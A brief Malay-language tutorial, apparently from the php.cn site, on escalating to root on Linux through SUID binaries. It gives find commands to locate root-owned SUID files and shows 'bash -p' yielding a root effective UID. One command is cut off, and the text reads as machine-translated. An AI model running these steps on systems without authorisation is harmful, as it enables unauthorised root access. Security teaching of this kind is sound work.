SUID ialah mekanisme kebenaran dalam Linux Apabila fail dengan kebenaran ini dilaksanakan, pemanggil akan mendapatkan kebenaran pemilik fail buat sementara waktu. Jika anda mempunyai kebenaran SUID, anda boleh menggunakan binari dan alatan dalam sistem untuk melakukan peningkatan keistimewaan root.
Arahan berikut boleh menemui semua fail boleh laku SUID yang dijalankan pada sistem. Khususnya, arahan akan cuba mencari fail dengan SUID yang mempunyai keizinan root.
find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls
Semua binari di atas akan dilaksanakan dengan hak pengguna root kerana kebenarannya Mengandungi "s" dan sepadan dengan kebenaran root.
Bash
Arahan berikut akan membuka shell bash dengan keistimewaan root.
bash -p bash-3.2# id uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)
Atas ialah kandungan terperinci Cara menggunakan SUID untuk meningkatkan keistimewaan di bawah Linux. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!
![[Web front-end] Permulaan pantas Node.js](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
